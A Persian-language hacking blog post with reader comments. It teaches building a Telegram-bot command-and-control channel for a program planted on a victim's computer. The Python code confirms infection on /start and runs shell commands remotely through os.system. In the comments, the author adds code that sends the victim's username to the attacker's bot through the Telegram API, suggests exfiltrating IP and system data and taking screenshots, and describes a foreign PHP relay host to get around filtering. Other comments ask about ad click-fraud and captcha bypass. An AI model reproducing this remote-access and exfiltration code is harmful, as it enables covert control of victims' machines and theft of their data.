برقراری ارتباط بین کامپیوتر و تلگرام :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

از اونجایی که پست تروجان نویسی بدلایلی متوقف شد تصمیم گرفتم برای جلوگیری از ضد حال خوردن ، حداقلش نحوه ی برقراری ارتباط با تلگرام تو پایتون رو بگم که بقیشو خودتون انجام بدین

همچنین ، خیلی کامل توضیح نمیدم بخاطر همین اگه سوالی براتون پیش اومد حتما بپرسین تا بهتون بگم که چیزی براتون مبهم نمونه ، خب اول از همه باید یه ربات برای خودمون بسازیم که برای اینکار قبلا وسطای این پست توضیح دادم ، بعد از ساخت ربات آدرس توکن ربات رو بریزین توی نوت پد و برین سراغ نصب کردن کتابخونه ی مورد نظر ، خب برای اینکار هم قبلا تو پست های زیادی گفتم ، اما شاید اینبار بهتر باشه با دسترسی ادمین خط فرمان رو باز کنین که برای اینکار میتونین با کلیک راست رو CMD روی گزینه ی Run as administrator بزنین و به ترتیب دستوراتی رو که میزارم رو بنویسین

\ Cd

Cd Python27\Scripts

pip install python-telegram-bot

بعد از اینکه دستور آخر رو نوشتین منتظر بمونین تا کتابخونه ی مورد نیاز نصب بشه ، بعدا یه فایل پایتون بسازین و کدهای زیر رو توی اون کپی کنین

from telegram.ext import Updater , CommandHandler

update = Updater('آدرس توکن رباتتون رو اینجا قرار بدین')

def start_method(bot , update):
    chat_id = update.message.chat_id
    bot.sendMessage(chat_id ,"متنی که قراره ارسال بشه")

start = CommandHandler("start" , start_method)

update.dispatcher.add_handler(start)

update.start_polling()

خب بعد از اینکه این کدهارو کپی کردین داخل فایل پایتونتون ، اول از همه آدرس توکن رو قرار بدین که از ربات BotFather دریافت کردین و کپی کردین داخل نوت پد ، بعدش تو قسمتی که گفتم متن ارسالی رو بنویسین ، یه متنی بنویسین که مثلا وقتی برناممون روی سیستم قربانی اجرا شد و ما توی ربات ساخته شده نوشتیم start/ متن مورد نظر ما ارسال بشه که متوجه بشیم برناممون روی اون سیستم قرار گرفته ، در کل برای اینکه ببینین این برنامه Ok هست یا نه ، بعد از ویرایش جاهای گفته شده ، برنامه رو Run کنین و توی ربات ساخته شده بنویسین start/ ، بعدش اگه پی ام مورد نظر ارسال شد به شما ، یعنی برنامه درسته ، در غیر اینصورت خودتون دست بکار بشین ببینین کجا سوتی دادین :)

حالا ما چیکار کردیم توی این کد ها ؟

اگه پایتون کار کرده باشین واقعا نیازی نیست که من همشو بگم ، فقط در این حد بدونین که ما یک تابع ایجاد کردیم و داخلش دستوراتمون رو نوشتیم که همین موجب ارسال اون پی ام به ربات میشد ، بعدا توی کد های آخر هم یک دکمه ایجاد کردیم به نام start/ که وقتی این دستور رو زدیم اون تابع ما فراخوانی میشه و موجب میشه که اون پی ام ارسال شه

حالا ما اینارو چیکار کنیم ؟ D:

من فقط یه توضیح کوتاه میدم برای علاقه مندا !!!

یه تابع بسازین توی کدها و دستوراتتون رو داخلش بنویسین که میتونین از کتابخونه ی os هم استفاده کنین ، مثلا دستور پایین موجب میشه یه پیغام به کاربر نشون داده بشه

import os
os.system("MSG * Http://Virus32.Blog.Ir")

اینجا ما کتابخونه ی os رو وارد کردیم و با استفاده از متد system توی کتابخونه ی os خط فرمان رو فراخوانی کردیم و ... ، حالا ما خط دوم رو میتونیم توی تابع قرار بدیم و با استفاده از کدهایی که وجود داره ، همونطور که برای دکمه ی start کد نویسی کردیم ، برای یه دکمه ی دیگه با اسم دلخواه کد نویسی کنیم که وقتی اونو توی ربات تلگرام زدیم دستورمون روی سیستم هدف اجرا بشه

بازم میگم ، اگه سوالی بود حتما بپرسین ، اگه بلد باشم جواب میدم

موفق باشید

نظر (۱۶)

سلام حاجی خیلی وقت بود نبودی خوش اومدی
ی مسابقه شرکت کردم تو تلگرام که باید لایک جمع کنم و برام حیاتیه ک برنده بشم
به فکر خرید لایک هم بودم ولی میدونی ک نمیشه تو مجازی ب کسی اعتماد کرد
خلاصه امیدم تنها این وبلاگ موند که ی راهی برای افزایش لایک بگی بهم...
موفق باشی
Virus32 MR_C0D3R ‌ :
سلام عزیز ، من نزدیک به سه چهار ماهی میشه که هستم :(
الان تنها چیزی که به ذهنم میرسه اینه که از برنامه های لایک بگیر استفاده کنی که تو کافه بازار و .. پره
داداش مگه نگفتی بعد عید می خوایم تروجان نویسی کنیم ÷س چرا گذاشتی کنار آموزشو ؟!!
Virus32 Terminator 32 :
پستش رو هم گذاشتم ولی با اخطار فتا مواجه شدم و برداشتم
جز خط قرمز ها حساب میشه و نمیشه اموزش داد
سلام آقای cod3r. میدونم ربطی به این پست تون نداره ولی گفتم شاید کامنت های پست های دیگه رو نخونید به خاطر همین اینجا می پرسم که
چطور میشه سیستم های تبلیغ کلیکی مثل anetwork یا weClick رو گول زد و مثلا در روز و با یک سیستم چندین بار روی تبلیغات کلیک کرد و سیستم متوجه نشه چون چندبار با برنامه های اسمپر امتحان کردم ولی متوجه شدن و اخطاریه اومد.

امیدوارم پاسخ بدین-ممنون.
Virus32 MR_C0D3R ‌ :
سلام عزیز ، فرقی نمیکنه کجا کامنت بدی چون اینجا لیست میشه و یکجا نمایش داده میشه
با سایت های کلیکی که معرفی کردی کار نکردم ، من فقط یه زمان عاشق Freebitco شده بودم که براش یه اسکریپت نوشتم بجای اینکه ما هر ساعت کلیک کنیم تا ساتوشی بده ، اسکریپت خود به خود کار میکرد و موجب میشد که هر ساعت خود به خود ساتوشی ثبت بشه (توی سرور مجازی) ، من زیاد نمیدونم باید چیکار کنی ، فقط میتونم بهت بگم که میتونی اسکریپت نویسی کنی برای اون وب یا چند تا اکانت بسازی و ... ، حرفی برای دور زدنش ندارم ، خودت که باهاش کار کردی ببین چطور میتونی مخشو بزنی :)
ببخشید داداش میدونم سرت شلوغه ولی میشه با آموزش مختصری تو پی دی اف یا ورد یا هرچیزی بنویسی من جیمیل یا تل بدم بفرستی ؟!!
Virus32 MR_C0D3R ‌ :
اتفاقا همین پست یه آموزش مختصره :)) یه خرده بخون پست رو توضیح دادم ، فقط با اندکی تغییرات :)
سلام داداش خوبی؟
چن تا درخواست داشتم ازت...
میشه آموزش بدی چجوری حالت last seen resently رو توی تلگرام دور بزنیم ،تا بفهمیم طرف کی آنلاین بوده؟تو اینترنت سرچ کردم روشاش خوب نیست.یه روش بهتر اگه سراغ داری خیلی خوب میشه.
اگه میشه یه گروه تلگرام بزن تا اونجا با هم راحتتر باشیم ...
مرسی....
Virus32 MR_C0D3R ‌ :
سلام عزیز ممنون ، نه نمیدونم باید چیکار کنی
سلام
سایت freebitco رو گفتید اسکریپت زدید
میخواستم بدونم مگه کپچا و ایمیج رو میشه دور زد ؟
اون موقعی که زدید همچین چیزی نداشت ؟
Virus32 MR_C0D3R ‌ :
تو پایتون کتابخونه ای وجود داره بنام pillow که برای پردازش تصویر هستش ؛ اگه باهاش کار کنی و خلاقیت بخرج بدی چرا که نه !!!
"...وقتی اونو توی ربات تلگرام زدیم دستورمون روی سیستم هدف اجرا بشه"

دستوره رو بلد نیستم میخام فقط ی عکس بگیره از صحفه تلش چ کنم ؟
خیلی گرفتارم راهشو بگو خودم میرم بقیشو
Virus32 MR_C0D3R ‌ :
اگه میخوای وقتی تلگرامش اجرا شد عکس بگیره و بفرسته باید یه خرده پایتون بلد باشی که بتونی براش تعریف کنی که اگه توی پردازش های اون کاربر تلگرام باز شد مثلا فلان کارو کن که مثلا شما میخوای اسکرین شات بگیری ، یه راه دیگش اینه که مثلا یه دستوری رو بزاری تا برات لیست برنامه هایی که توسط سیستم کاربر دارن پردازش میشن رو بفرسته تا خودت چک کنی تا اگه تلگرامش باز بود سریع خودت دستور اسکرین شات رو بدی به برنامه ، راستی اینو هم بگم برای اجرای برنامه نیازی نیست که تلگرام رو سیستم هدف نصب باشه (احتمال دادم فک کرده باشی که حتما باید نصب باشه بخاطر همین گفتم) ، فقط باید رو سیستم خودت نصب باشه ، اگه خواستی من فقط میتونم راهنماییت کنم که دستور اسکرین شات رو بتونی رو سیستم کاربر ران کنی وگرنه اگه بخوام چیزای دیگه رو بگم میشه یه مفت خوری تمام عیار ولی خیلی سادست مثلا همونطور که گفتم برنامه های درحال پردازش رو لیست کنی و یه شرط بزاری که اگه telegram باز بود سریع بدو  و اون کارو کن که گفتم
داداش خدا جزای خیرتو بده مشکلم حل شد .
فعلا درحال یادگیری سی شارپم اون سوالو فقط واسه گرفتاریم پرسیدم .فعلا میخام فقط سی شارپو ادامه بدم
مرسی ک هستی
التماس دعا
Virus32 MR_C0D3R ‌ :
اوکی ، خواهش میکنم ، موفق باشی
  • Virus32
  • توحید اقدامی
  • $$$$$$$$$$$$$$$$$$$$
    $$ T H A N K Y O U $$
    $$$$$$$$$$$$$$$$$$$$

    بازی تانکی آنلاین را بازی کنید حتما جالبه
    Virus32 MR_C0D3R ‌ :
    خواهش ، اهل بازی کردن نیستم عزیز :(
    سلام استاد.

    داداش من یه مشکلی دارم از وقتی پایتون 2 رو نصب کردم و هر پروژه ای چه آماده چه خودم مینویسم رو سیو میکنم میخوام اجراش کنم سریع صفحه بسته میشه  کامپایل هم میکنم باز اون مشکل وجود داره 

    چیکار کنم داداش؟
    Virus32 MR_C0D3R ‌ :
    سلام عزیز
    اگه هر اسکریپتی رو اینجوری میکنه
    بهتره پایتون رو یکبار بطور کلی حذفش کنی
    بعد مجددا برو تو محل نصب پایتون و پوشه Python27 رو هم حذفش کن
    بعدا مجددا نصب کن و اسکریپتاتو تست کن
    البته قبل از اجرای کدها بهتره که اول از همه تو حالت Shell Script کدهارو اجرا کنی
    یعنی وقتی که روی اسکریپت کلیک راست کردی ، بزنی روی گزینه Edit with IDLE و بعدا
    کلید F5 رو بزنی تا اجرا بشه و ارور رو بهت نشون بده تا بدونی مشکلش چیه
    سلامی دوباره :)

    مستر جان ممکنه فیلترینگ تلگرام روی این پروژه اثر داشته باشه (سمت کلاینت)

    برای من کار نمیکنه چون(قبلا کار میکرد)

    روشی واسه دورزدنش داری ؟


    Virus32 MR_C0D3R ‌ :
    سلام
    آره عزیز بخاطر فیلترینگه
    البته کدهای کتابخونه هم تغییر کرده
    بخاطر همین اگر فیلترشکن هم روشن باشه بازم امکان ارسال نخواهد بود
    از اونجایی که کدهای کتابخونه ها هی عوض میشه
    بخاطر همین بهتره که از API های وب تلگرام استفاده کنیم
    البته اینکار نیاز به فیلترشکن داره...
    پس با یک مثال ساده متوجهت میکنم...
    مثلا میایم و یوزر یه سیستم رو برای خودمون ارسال میکنیم
    که بعد از یه خرده دستکاری میتونی آی پی و اطلاعات دیگه ی سیستم رو هم برای خودت ارسال کنی
    import os
    import urllib2
    حالا باید کدهای پایین رو قرار بدیم
    try:
        txt_username = os.environ['Username']
        text_info = "Hello Admin...👌\nYour Target Username : " + str(txt_username)
        text_full = str(text_info)
        bot_id = '' # باید یه ربات بسازی و آی دی ربات رو اینجا بزاری
        urllib2.urlopen("https://api.telegram.org/bot" + bot_id + "/sendMessage", urllib.urlencode({ "chat_id": چت آی دی میاد اینجا, "text": text_full })).read()  # ربات دریافت چت آی دی رو استارت میکنی و وقتی که چت آی دی رو دریافت کردی تو محل مناسبش قرار میدی
    except:
        pass
    حالا تو جاهایی که مشخص کردم
    باید آدرس توکن ربات رو قرار بدی
    و تو جای مربوطه هم آدرس چت آی دی رو قرار بدی
    و در نهایت اجرا ... 
    ------
    چرا خیلی راحت میتونیم دور بزنیم
    یه مثال میزنم خودت بقیشو برو...
    دیدی بعضی از ارائه دهنده های هاست
    هاست های خارجی ارائه میدن ؟
    خب خارجی ها هم فیلترینگ براشون معنایی نداره که .... 
    پس ما میایم و یه هاست خارجی تهیه میکنیم ( مثلا آلمان )
    بعدا داخل هاست یه فایل پی اچ پی درست میکنیم
    و دستور میدیم که یه ورودی توی URL دریافت کنه و اونو با درخواست POST یا GET
    بفرسته سمت تلگرام
    و چون هاستمون خارجیه ، فایل پی اچ پی بدون مشکل اطلاعات رو ارسال میکنه
    حالا باید تو پایتون مثل کدهای بالا یه درخواست بفرستیم سمت URL خودمون ....
    یا اینکه میتونیم از پروکسی استفاده کنیم...
    استفاده از پروکسی هم تو این پست یاد گرفتیم...
    موفق باشی... :)

    سلام من یه دستوری میخوام بنویسم که بعدازکلیک یه چیزی توربات تلگرامم نشون بده 

    ولی بدون اینکه startیاچیزه دیگه ای روبزنم نشون بده

    سلام هنوز هستی؟ اگه هستی یه پیام بهم بده

    Virus32 Attrib32 32 32 :
    دادم
    البته پیام (:

    دمت گرم با قند شکن کار کرد ولی چجوری یه پیام  به قربانی بفرستیم؟؟

    Virus32 Attrib32 32 32 :
    این کتابخونه است دیگه وایسی پستش رو بعد از گرافیکی میزاریم

    سلام من اینو اط قبل داشتم فقط چطور میشه فیلتریگ رو دور زد؟؟؟؟ 

    Virus32 MR_C0D3R ‌ :
    سلام
    یه هاست اوکی کن که برای یه کشوری باشه که اونجا فیلترینگ معنا نداشته باشه
    بعدا به کمک PHP یه درخواست به سمت فایل پی اچ پی میفرستی که اون فایل PHP بیاد و کارای مربوط به تلگرام رو انجام بده
    چون هاستت برای خارج از کشوره بخاطر همین دیگه هیچ مشکلی پیش نمیاد...
    روش دیگه هم به کمک برنامه نویسی سوکت هستش که اونموقع باید یه سرور مجازی خارجی تهیه کنی که خرجش زیاد میشه
    بهترین راهکار همون هاست و دامنه ارزون هستش که برات ارزون تر در بیاد...

    سلام کدر

    ببین میخوای من آموزش API رو بزارم؟

    درست کنم بزارم اینجا بعد بیان استفاده کنند.

    راستی

    سایت گیگفا دیتا سنتراش مال آلمان یا روسیه بود.درست یادم نیست کدوم بوده

    اما یادمه که مال خارج بود. همین کشور های اروپایی(روسیه رو گفتم چون فکر کردم شاید اون هم باشه)

    بیایم توی همون درست کنیم کلا

    خوبه؟

    پیام های بالا ترشم بخون

    نوشته تروجان

    اونم یاد میدم. اما نمیگم چه طوری باید سر همش کرد که مشکلی پیش نیاد!

    فقط چند تا دستور اساسی رو میگم،(خیلی هم اساسی نه یه چیز ساده و باحال:) )

    و اون API

    هر کی یکم فکر کنه میفهمه که چه طوری میتونه APi رو به پایتونش وصل کنه

     

    Virus32 MR_C0D3R ‌ :
    سلام
    آموزشت رو بنویس و برامون ارسال کن...
    ولی فکر نکنم اعصابت بکشه 
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی